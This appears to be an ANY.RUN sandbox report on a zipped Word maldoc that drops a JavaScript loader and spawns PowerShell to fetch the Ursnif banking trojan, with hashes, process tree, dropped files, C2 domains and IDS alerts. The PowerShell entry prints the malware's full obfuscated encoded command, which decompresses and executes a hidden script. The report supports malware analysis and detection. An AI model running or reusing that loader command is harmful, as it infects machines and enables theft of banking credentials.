analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Sample.zip

Full analysis: https://app.any.run/tasks/e25cdfe2-e9e5-47da-bde1-edfc6f98b202
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: September 19, 2019, 11:35:11
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
malscr-1
gozi
ursnif
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

CBD87740BF6E2B49CBB55AA2F21ED98E

SHA1:

A2735753D904FBD9A176861DDFE225D2DB7969B3

SHA256:

913BF8500588352C3CF2FF12A24D47997EF53D17B6696285E5C73EA1C006A7E4

SSDEEP:

768:wyiVcEBIjwomU5I2K3Y8sLcFnO4/yeZVG+Ld0lm4d71pRfMeTo65zl6Ym9z:CBIIU5I/sLcFnO4/ysVzAt71j0QDNu

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops known JS loader

      • WINWORD.EXE (PID: 3184)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3184)
    • Executes scripts

      • WINWORD.EXE (PID: 3184)
    • URSNIF was detected

      • powershell.exe (PID: 2636)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • WinRAR.exe (PID: 3504)
    • Creates files in the Windows directory

      • WINWORD.EXE (PID: 3184)
      • powershell.exe (PID: 2636)
    • Executes PowerShell scripts

      • WScript.exe (PID: 2348)
    • Creates files in the user directory

      • powershell.exe (PID: 2636)
    • Removes files from Windows directory

      • powershell.exe (PID: 2636)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3184)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3184)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0009
ZipCompression: Deflated
ZipModifyDate: 2019:09:19 11:16:06
ZipCRC: 0x2a58f344
ZipCompressedSize: 41560
ZipUncompressedSize: 80896
ZipFileName: info_09_19.doc
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
4
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs winword.exe no specs wscript.exe no specs #URSNIF powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3504"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\Sample.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
3184"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb3504.43835\info_09_19.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2348"C:\Windows\System32\WScript.exe" "C:\Windows\Temp\zGjagpXxv.js" C:\Windows\System32\WScript.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Version:
5.8.7600.16385
2636"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -En IAAoACAALgAoACcAbgBFAHcAJwArACcALQBPAEIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIAAgAFMAWQBTAFQAYABlAG0AYAAuAGkAbwBgAC4AQwBPAE0AUABSAGAARQBgAHMAUwBpAE8AYABOAC4AZABlAGYAbABBAFQAZQBgAFMAVABSAEUAQQBtACgAWwBzAHkAUwB0AGUAbQAuAEkATwAuAE0ARQBNAE8AcgBZAHMAdAByAGUAQQBtAF0AWwBzAFkAUwBUAGUATQAuAEMATwBOAFYAZQByAFQAXQA6ADoARgBSAG8ATQBCAGEAcwBlADYANABzAHQAcgBpAG4ARwAoACcAZgBjADAAOQBDADQASgBRAEYATQBiAHgAcgArAEkAZwBuAEsASwA2AFoAaQBGAHAASQBRADEAWgBFAEkAZwAwAEMAQwA0AE8AdgBuAFQAUwBHACsAcQA1ADYAaQAyAHoAVAA1ADgAMQBOAEUAWABUAHMAegB6ADgALwBtAHEASABpAGMAMQBHAFUATQBFAEUAcwBKAHYAUgBNAE0AawBWAFUAdwBsAGoAeABjAFAASQBqADEAaQBBAFMAYgBSAHoATwBYAHIAKwBSAGwARwBIAE0AMwBNAG8AcQBGAHkASwBuAGMAUABSADMAWQA4AGcAbAAxAEsAcwBOAGUAMQBDAHMAbwB4ADUAOABXAFEAcABsAFYAcAByAEwAVQB6ADkAcABQAFYAUwBaAHkASQBYADIAOABMAE8ARwBsADQAWQByAE0ARQBFAHAAZwByAHMAMQBtAEgAQQBxAHoATgAxAGIAZQBoAGoASwBjAEwAVgBmAE0ANwB3AGcAVABEACsANQB3AHQAcQB1AEcAbABsAHgAcgBXAG0ANQBkADMAOABWAEkAagBmADYAdgA0AGQAKwBJAFYAYQBYAC8AUQBGACcAKQAgACwAWwBzAFkAcwBUAGUAbQAuAGkAbwAuAGMATwBNAHAAUgBlAFMAcwBpAE8ATgAuAEMAbwBtAHAAcgBlAHMAcwBJAE8ATgBNAE8ARABFAF0AOgA6AEQARQBDAG8AbQBwAHIAZQBTAFMAIAApAHwAJgAoACcAZgAnACsAJwBvAHIAZQAnACsAJwBhAGMASAAnACkAewAgACYAKAAnAE4ARQBXAC0AbwBiACcAKwAnAEoAJwArACcARQBjAFQAJwApACAAIABpAGAAbwAuAGAAUwBgAFQAcgBlAGEAbQBSAEUAQQBEAEUAUgAoACQAXwAsAFsAcwB5AFMAVABlAG0ALgBUAEUAeABUAC4ARQBOAGMAbwBkAEkAbgBHAF0AOgA6AGEAcwBDAGkAaQApACAAfQB8AC4AKAAnAEYAbwByAEUAYQAnACsAJwBDACcAKwAnAEgAJwApAHsAJABfAC4AcgBlAEEAZABUAG8ARQBOAEQAKAApACAAfQAgACkAIAB8AC4AKAAnAEkAZQB4ACcAKQA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 903
Read events
1 427
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
3
Text files
1
Unknown types
3

Dropped files

PID
Process
Filename
Type
3184WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRCB34.tmp.cvr
MD5:
SHA256:
2636powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y1VBFF0RJT9KQR2ZVMEA.temp
MD5:
SHA256:
3184WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:FDFDE35C48F5BEAC3AF65B1D73DA2AD3
SHA256:8230A157DDA6FFD733D4884E5D438B802542DFDC6F33306B62FE6F83928FF984
3184WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:1637DD56E488A02AE0DFA3A1693FD404
SHA256:2E0E01C98576DEA5BAE26CC8B99D525272F1835D1B20C8FE9705AE0EBE1BC3EF
3184WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Rar$DIb3504.43835\~$fo_09_19.docpgc
MD5:8934E1D6F841CBCB53F0D3FD69AD5C61
SHA256:9415E36D5AC517EBF54F63760EE8988558D5C79FC6AC617C604E23EF3092EB1F
3504WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIb3504.43835\info_09_19.docdocument
MD5:43B6D3B2FD4ACABA41A2BB89272C7AC9
SHA256:B6B88F30582A7BAB1671CEA20445CC45AB3B0258AE7F64A7A6F923AC14382973
2636powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0F2CAD9746414ABA31294C3B560FCFD5
SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15
3184WINWORD.EXEC:\Windows\Temp\zGjagpXxv.jstext
MD5:88F64FE97CCF81690CF43D39C700F0F3
SHA256:A67BAFF1F9FDADE2B3F55A26E7BCB9B74CE0A9E58E81A7DD776BB42770ABE40C
2636powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF16d66f.TMPbinary
MD5:0F2CAD9746414ABA31294C3B560FCFD5
SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
2
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2636
powershell.exe
185.65.202.69:80
fotmailz.com
Individual Entrepreneur Kulin Tomofei Konstantinovich
RU
malicious

DNS requests

Domain
IP
Reputation
fotmailz.com
  • 185.65.202.69
malicious
pori89g5jqo3v8.com
suspicious

Threats

PID
Process
Class
Message
2636
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] MalDoc Requesting Ursnif Payload
1 ETPRO signatures available at the full report
No debug info